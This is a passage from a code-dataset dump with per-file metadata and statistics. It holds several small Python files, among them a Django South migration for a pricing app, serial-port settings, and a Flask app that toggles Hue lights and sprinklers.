| 13.6 | 24 | 0.720588 | 10 | 68 | 4.5 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 68 | 4 | 25 | 17 | 0.803571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2ecb56aebe10c1f15432d36862462b35bde26a5b | 111 | py | Python | service/Resources/__init__.py | brandonkdutton/cs361-service | 87ddd06a6de8dfabe1ffb59c01fa43afc91f8e23 | [
"Apache-2.0"
] | null | null | null | service/Resources/__init__.py | brandonkdutton/cs361-service | 87ddd06a6de8dfabe1ffb59c01fa43afc91f8e23 | [
"Apache-2.0"
] | null | null | null | service/Resources/__init__.py | brandonkdutton/cs361-service | 87ddd06a6de8dfabe1ffb59c01fa43afc91f8e23 | [
"Apache-2.0"
] | null | null | null | from .image_transformer import ImageTransformer
from .image import Image
from .image_upload import ImageUpload
| 27.75 | 47 | 0.864865 | 14 | 111 | 6.714286 | 0.5 | 0.287234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 111 | 3 | 48 | 37 | 0.949495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2eefa4a18222c24a5a82cd68ea5552a29329d87e | 17,010 | py | Python | src/ralph_pricing/migrations/0001_initial.py | zefciu/ralph_pricing | f3c9e23b36331ec0ab464afd08fcab5f96921c1e | [
"Apache-2.0"
] | null | null | null | src/ralph_pricing/migrations/0001_initial.py | zefciu/ralph_pricing | f3c9e23b36331ec0ab464afd08fcab5f96921c1e | [
"Apache-2.0"
] | null | null | null | src/ralph_pricing/migrations/0001_initial.py | zefciu/ralph_pricing | f3c9e23b36331ec0ab464afd08fcab5f96921c1e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Device'
db.create_table('ralph_pricing_device', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('device_id', self.gf('django.db.models.fields.IntegerField')(unique=True)),
('asset_id', self.gf('django.db.models.fields.IntegerField')(default=None, unique=True, null=True, blank=True)),
('is_virtual', self.gf('django.db.models.fields.BooleanField')(default=False)),
('is_blade', self.gf('django.db.models.fields.BooleanField')(default=False)),
('slots', self.gf('django.db.models.fields.FloatField')(default=0)),
))
db.send_create_signal('ralph_pricing', ['Device'])
# Adding model 'Venture'
db.create_table('ralph_pricing_venture', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('venture_id', self.gf('django.db.models.fields.IntegerField')()),
('name', self.gf('django.db.models.fields.CharField')(default=u'', max_length=255)),
('department', self.gf('django.db.models.fields.CharField')(default=u'', max_length=255)),
('parent', self.gf('mptt.fields.TreeForeignKey')(default=None, related_name=u'children', null=True, blank=True, to=orm['ralph_pricing.Venture'])),
('lft', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('rght', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('tree_id', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('level', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
))
db.send_create_signal('ralph_pricing', ['Venture'])
# Adding model 'DailyPart'
db.create_table('ralph_pricing_dailypart', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('date', self.gf('django.db.models.fields.DateField')()),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('pricing_device', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.Device'])),
('asset_id', self.gf('django.db.models.fields.IntegerField')()),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=16, decimal_places=6)),
('is_deprecated', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('ralph_pricing', ['DailyPart'])
# Adding unique constraint on 'DailyPart', fields ['date', 'asset_id']
db.create_unique('ralph_pricing_dailypart', ['date', 'asset_id'])
# Adding model 'DailyDevice'
db.create_table('ralph_pricing_dailydevice', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('date', self.gf('django.db.models.fields.DateField')()),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('pricing_device', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.Device'])),
('parent', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'child_set', on_delete=models.SET_NULL, default=None, to=orm['ralph_pricing.Device'], blank=True, null=True)),
('price', self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=16, decimal_places=6)),
('pricing_venture', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['ralph_pricing.Venture'], null=True, on_delete=models.SET_NULL, blank=True)),
('is_deprecated', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('ralph_pricing', ['DailyDevice'])
# Adding unique constraint on 'DailyDevice', fields ['date', 'pricing_device']
db.create_unique('ralph_pricing_dailydevice', ['date', 'pricing_device_id'])
# Adding model 'UsageType'
db.create_table('ralph_pricing_usagetype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
))
db.send_create_signal('ralph_pricing', ['UsageType'])
# Adding model 'UsagePrice'
db.create_table('ralph_pricing_usageprice', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.UsageType'])),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=16, decimal_places=6)),
('start', self.gf('django.db.models.fields.DateField')()),
('end', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal('ralph_pricing', ['UsagePrice'])
# Adding unique constraint on 'UsagePrice', fields ['start', 'type']
db.create_unique('ralph_pricing_usageprice', ['start', 'type_id'])
# Adding unique constraint on 'UsagePrice', fields ['end', 'type']
db.create_unique('ralph_pricing_usageprice', ['end', 'type_id'])
# Adding model 'DailyUsage'
db.create_table('ralph_pricing_dailyusage', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('date', self.gf('django.db.models.fields.DateField')()),
('pricing_venture', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['ralph_pricing.Venture'], null=True, on_delete=models.SET_NULL, blank=True)),
('pricing_device', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['ralph_pricing.Device'], null=True, on_delete=models.SET_NULL, blank=True)),
('value', self.gf('django.db.models.fields.FloatField')()),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.UsageType'])),
))
db.send_create_signal('ralph_pricing', ['DailyUsage'])
# Adding unique constraint on 'DailyUsage', fields ['date', 'pricing_device', 'type']
db.create_unique('ralph_pricing_dailyusage', ['date', 'pricing_device_id', 'type_id'])
# Adding model 'ExtraCostType'
db.create_table('ralph_pricing_extracosttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
))
db.send_create_signal('ralph_pricing', ['ExtraCostType'])
# Adding model 'ExtraCost'
db.create_table('ralph_pricing_extracost', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('start', self.gf('django.db.models.fields.DateField')()),
('end', self.gf('django.db.models.fields.DateField')()),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.ExtraCostType'])),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=16, decimal_places=6)),
('pricing_venture', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.Venture'])),
))
db.send_create_signal('ralph_pricing', ['ExtraCost'])
# Adding unique constraint on 'ExtraCost', fields ['start', 'pricing_venture', 'type']
db.create_unique('ralph_pricing_extracost', ['start', 'pricing_venture_id', 'type_id'])
# Adding unique constraint on 'ExtraCost', fields ['end', 'pricing_venture', 'type']
db.create_unique('ralph_pricing_extracost', ['end', 'pricing_venture_id', 'type_id'])
def backwards(self, orm):
# Removing unique constraint on 'ExtraCost', fields ['end', 'pricing_venture', 'type']
db.delete_unique('ralph_pricing_extracost', ['end', 'pricing_venture_id', 'type_id'])
# Removing unique constraint on 'ExtraCost', fields ['start', 'pricing_venture', 'type']
db.delete_unique('ralph_pricing_extracost', ['start', 'pricing_venture_id', 'type_id'])
# Removing unique constraint on 'DailyUsage', fields ['date', 'pricing_device', 'type']
db.delete_unique('ralph_pricing_dailyusage', ['date', 'pricing_device_id', 'type_id'])
# Removing unique constraint on 'UsagePrice', fields ['end', 'type']
db.delete_unique('ralph_pricing_usageprice', ['end', 'type_id'])
# Removing unique constraint on 'UsagePrice', fields ['start', 'type']
db.delete_unique('ralph_pricing_usageprice', ['start', 'type_id'])
# Removing unique constraint on 'DailyDevice', fields ['date', 'pricing_device']
db.delete_unique('ralph_pricing_dailydevice', ['date', 'pricing_device_id'])
# Removing unique constraint on 'DailyPart', fields ['date', 'asset_id']
db.delete_unique('ralph_pricing_dailypart', ['date', 'asset_id'])
# Deleting model 'Device'
db.delete_table('ralph_pricing_device')
# Deleting model 'Venture'
db.delete_table('ralph_pricing_venture')
# Deleting model 'DailyPart'
db.delete_table('ralph_pricing_dailypart')
# Deleting model 'DailyDevice'
db.delete_table('ralph_pricing_dailydevice')
# Deleting model 'UsageType'
db.delete_table('ralph_pricing_usagetype')
# Deleting model 'UsagePrice'
db.delete_table('ralph_pricing_usageprice')
# Deleting model 'DailyUsage'
db.delete_table('ralph_pricing_dailyusage')
# Deleting model 'ExtraCostType'
db.delete_table('ralph_pricing_extracosttype')
# Deleting model 'ExtraCost'
db.delete_table('ralph_pricing_extracost')
models = {
'ralph_pricing.dailydevice': {
'Meta': {'ordering': "(u'pricing_device', u'date')", 'unique_together': "((u'date', u'pricing_device'),)", 'object_name': 'DailyDevice'},
'date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deprecated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['ralph_pricing.Device']", 'blank': 'True', 'null': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '16', 'decimal_places': '6'}),
'pricing_device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.Device']"}),
'pricing_venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_pricing.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'ralph_pricing.dailypart': {
'Meta': {'ordering': "(u'asset_id', u'pricing_device', u'date')", 'unique_together': "((u'date', u'asset_id'),)", 'object_name': 'DailyPart'},
'asset_id': ('django.db.models.fields.IntegerField', [], {}),
'date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deprecated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '6'}),
'pricing_device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.Device']"})
},
'ralph_pricing.dailyusage': {
'Meta': {'ordering': "(u'pricing_device', u'type', u'date')", 'unique_together': "((u'date', u'pricing_device', u'type'),)", 'object_name': 'DailyUsage'},
'date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pricing_device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_pricing.Device']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'pricing_venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_pricing.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.UsageType']"}),
'value': ('django.db.models.fields.FloatField', [], {})
},
'ralph_pricing.device': {
'Meta': {'object_name': 'Device'},
'asset_id': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'device_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_blade': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_virtual': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slots': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'ralph_pricing.extracost': {
'Meta': {'unique_together': "[(u'start', u'pricing_venture', u'type'), (u'end', u'pricing_venture', u'type')]", 'object_name': 'ExtraCost'},
'end': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '6'}),
'pricing_venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.Venture']"}),
'start': ('django.db.models.fields.DateField', [], {}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.ExtraCostType']"})
},
'ralph_pricing.extracosttype': {
'Meta': {'object_name': 'ExtraCostType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'ralph_pricing.usageprice': {
'Meta': {'ordering': "(u'type', u'start')", 'unique_together': "[(u'start', u'type'), (u'end', u'type')]", 'object_name': 'UsagePrice'},
'end': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '6'}),
'start': ('django.db.models.fields.DateField', [], {}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.UsageType']"})
},
'ralph_pricing.usagetype': {
'Meta': {'object_name': 'UsageType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'ralph_pricing.venture': {
'Meta': {'object_name': 'Venture'},
'department': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'default': 'None', 'related_name': "u'children'", 'null': 'True', 'blank': 'True', 'to': "orm['ralph_pricing.Venture']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'venture_id': ('django.db.models.fields.IntegerField', [], {})
}
}
complete_apps = ['ralph_pricing'] | 64.923664 | 228 | 0.614403 | 1,905 | 17,010 | 5.315486 | 0.055118 | 0.081375 | 0.141023 | 0.201462 | 0.864408 | 0.803674 | 0.776318 | 0.730298 | 0.668082 | 0.619297 | 0 | 0.005175 | 0.182011 | 17,010 | 262 | 229 | 64.923664 | 0.722582 | 0.09224 | 0 | 0.350785 | 0 | 0.005236 | 0.514798 | 0.333268 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010471 | false | 0 | 0.020942 | 0 | 0.04712 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2efc7c977f0f6256952f051974811b1d58553d10 | 83 | py | Python | paddleseg3d/datasets/preprocess_utils/__init__.py | parap1uie-s/PaddleSeg3D | 419e8158f057c98e3c78b2a5f80254259ec8478a | [
"Apache-2.0"
] | null | null | null | paddleseg3d/datasets/preprocess_utils/__init__.py | parap1uie-s/PaddleSeg3D | 419e8158f057c98e3c78b2a5f80254259ec8478a | [
"Apache-2.0"
] | null | null | null | paddleseg3d/datasets/preprocess_utils/__init__.py | parap1uie-s/PaddleSeg3D | 419e8158f057c98e3c78b2a5f80254259ec8478a | [
"Apache-2.0"
] | null | null | null | from .values import *
from .geometry import *
from .uncompress import uncompressor
| 20.75 | 36 | 0.795181 | 10 | 83 | 6.6 | 0.6 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144578 | 83 | 3 | 37 | 27.666667 | 0.929577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2c2677ca64f33e37bed56f94854ee1e79cc5fe79 | 431 | py | Python | dsmr_parser/clients/settings.py | vavdb/dsmr_parser | de5c884d8d4c8cc789155fd37d03caf31d997452 | [
"MIT"
] | null | null | null | dsmr_parser/clients/settings.py | vavdb/dsmr_parser | de5c884d8d4c8cc789155fd37d03caf31d997452 | [
"MIT"
] | null | null | null | dsmr_parser/clients/settings.py | vavdb/dsmr_parser | de5c884d8d4c8cc789155fd37d03caf31d997452 | [
"MIT"
] | null | null | null | import serial
SERIAL_SETTINGS_V2_2 = {
'baudrate': 9600,
'bytesize': serial.SEVENBITS,
'parity': serial.PARITY_EVEN,
'stopbits': serial.STOPBITS_ONE,
'xonxoff': 0,
'rtscts': 0,
'timeout': 20
}
SERIAL_SETTINGS_V4 = {
'baudrate': 115200,
'bytesize': serial.SEVENBITS,
'parity': serial.PARITY_EVEN,
'stopbits': serial.STOPBITS_ONE,
'xonxoff': 0,
'rtscts': 0,
'timeout': 20
}
| 18.73913 | 36 | 0.62181 | 47 | 431 | 5.510638 | 0.425532 | 0.108108 | 0.177606 | 0.223938 | 0.725869 | 0.725869 | 0.725869 | 0.725869 | 0.725869 | 0.725869 | 0 | 0.062874 | 0.225058 | 431 | 22 | 37 | 19.590909 | 0.712575 | 0 | 0 | 0.631579 | 0 | 0 | 0.232019 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
258fd284b24465674f81bdaac846d31cb29e311d | 34 | py | Python | __init__.py | DivyanshuSingh96/myCalc9 | e26f1723a1e1d4fb45ec111279f9b1055ae2449f | [
"MIT"
] | 2 | 2021-03-03T11:46:40.000Z | 2021-07-07T12:24:50.000Z | __init__.py | DivyanshuSingh96/myCalc9 | e26f1723a1e1d4fb45ec111279f9b1055ae2449f | [
"MIT"
] | null | null | null | __init__.py | DivyanshuSingh96/myCalc9 | e26f1723a1e1d4fb45ec111279f9b1055ae2449f | [
"MIT"
] | null | null | null | from myCalc9.arithmetics import *
| 17 | 33 | 0.823529 | 4 | 34 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.117647 | 34 | 1 | 34 | 34 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
25eb000a789e18fcdcb030744e52444ccb3f38ec | 5,010 | py | Python | services/wsgi.py | santiagofacchini/home-automation | c0008c292b0db73ea66c6759c1eb2858fa803891 | [
"MIT"
] | null | null | null | services/wsgi.py | santiagofacchini/home-automation | c0008c292b0db73ea66c6759c1eb2858fa803891 | [
"MIT"
] | null | null | null | services/wsgi.py | santiagofacchini/home-automation | c0008c292b0db73ea66c6759c1eb2858fa803891 | [
"MIT"
] | null | null | null | import os
from flask import Flask
from flask import render_template
from HueClient import Light
from SonoffClient import Switch
from dotenv import load_dotenv
# Load environment variables from .env file (must be in ~)
load_dotenv(f'{os.environ["HOME"]}/.env')
# Hue client
hue_user = os.environ['HUE_USER']
hue_ip = os.environ['HUE_IP']
# Sprinklers
sprinklers_ip = os.environ['SPRINKLERS_IP']
sprinklers_port = os.environ['SPRINKLERS_PORT']
app = Flask(__name__)
@app.route('/')
def main():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/all-on")
def all_on():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor.turn_on()
sala_de_estar.turn_on()
dormitorio.turn_on()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/all-off")
def all_off():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor.turn_off()
sala_de_estar.turn_off()
dormitorio.turn_off()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/comedor")
def comedor():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor.flip_state()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/sala-de-estar")
def sala_de_estar():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
sala_de_estar.flip_state()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/dormitorio")
def dormitorio():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
dormitorio.flip_state()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/sprinklers")
def sprinklers():
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers.switch_state()
sprinklers_state = sprinklers.get_info()
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=4000, load_dotenv=True) | 42.820513 | 179 | 0.765868 | 716 | 5,010 | 4.955307 | 0.082402 | 0.067644 | 0.124014 | 0.126268 | 0.82159 | 0.81257 | 0.81257 | 0.797914 | 0.797914 | 0.797914 | 0 | 0.006668 | 0.131936 | 5,010 | 117 | 180 | 42.820513 | 0.809152 | 0.015569 | 0 | 0.623762 | 0 | 0 | 0.048691 | 0.009333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0 | 0.059406 | 0 | 0.19802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d30ca7d1a9433459ec2672c985efbaa1d4de9991 | 58 | py | Python | python/testData/quickFixes/PyRemoveParameterQuickFixTest/kwParam_after.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/quickFixes/PyRemoveParameterQuickFixTest/kwParam_after.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/quickFixes/PyRemoveParameterQuickFixTest/kwParam_after.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z |
def foo(r):
def a():
pass
x = 1
x = 2 | 9.666667 | 12 | 0.327586 | 10 | 58 | 1.9 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.534483 | 58 | 6 | 13 | 9.666667 | 0.62963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.2 | 0 | 0 | 0.4 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
d323c6aaa77d2038a7ff94c81fd580cccec65641 | 71 | py | Python | hackaton/ML.py | vladimirbahmetyev/SocialHack | 8b530384dd2d440be1f6d480f39aec31d8c9dab7 | [
"Apache-2.0"
] | null | null | null | hackaton/ML.py | vladimirbahmetyev/SocialHack | 8b530384dd2d440be1f6d480f39aec31d8c9dab7 | [
"Apache-2.0"
] | null | null | null | hackaton/ML.py | vladimirbahmetyev/SocialHack | 8b530384dd2d440be1f6d480f39aec31d8c9dab7 | [
"Apache-2.0"
] | 1 | 2019-05-11T23:53:04.000Z | 2019-05-11T23:53:04.000Z | import random
def CalcTone(input: str):
